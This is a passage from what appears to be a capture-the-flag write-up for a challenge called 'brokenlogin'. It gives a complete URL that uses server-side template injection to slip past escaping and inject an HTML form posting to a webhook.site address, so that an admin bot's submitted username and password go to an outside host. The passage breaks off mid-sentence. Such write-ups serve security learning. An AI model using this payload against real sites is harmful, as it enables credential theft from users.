The final URL to send to the admin bot was:
```
https://brokenlogin.web.actf.co/?a=%3Cform%20action=%22https://webhook.site/1cd86cf8-333c-4a1d-b26d-f7e47c934641%22%20a=%22%3E&message={{request.args.a|safe}}
```

This bypasses the `escape` filtering by using the template injection to reference another query parameter.

The admin bot would then fill out the form with a username and password and submit the form. By providing a payload of `